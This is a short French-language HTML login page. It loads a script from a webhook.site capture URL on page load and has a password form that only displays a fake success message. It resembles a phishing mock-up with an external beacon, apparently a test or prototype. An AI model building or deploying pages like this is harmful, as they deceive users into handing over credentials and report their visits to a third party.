<html>
<head>
  <script src="https://webhook.site/150253f3-c9bc-4157-ba0d-f42c39629c48"></script>
  <script>
    function showSuccess() {
      document.getElementById('successMessage').style.display = 'block'; // Show the success message
      return false;
    }
  </script>
</head>
<body>
  <h1>Bienvenue, connectez-vous pour accéder à votre compte</h1>
  <form onsubmit="return showSuccess();">
    <label for="username">Nom d'utilisateur :</label><br>
    <input type="text" id="username" name="username" required><br>
    <label for="password">Mot de passe :</label><br>
    <input type="password" id="password" name="password" required><br><br>
    <input type="submit" value="Se connecter">
  </form>
  <p id="successMessage" style="color: green; display: none;">Form submitted successfully!</p> 
</body>
</html>
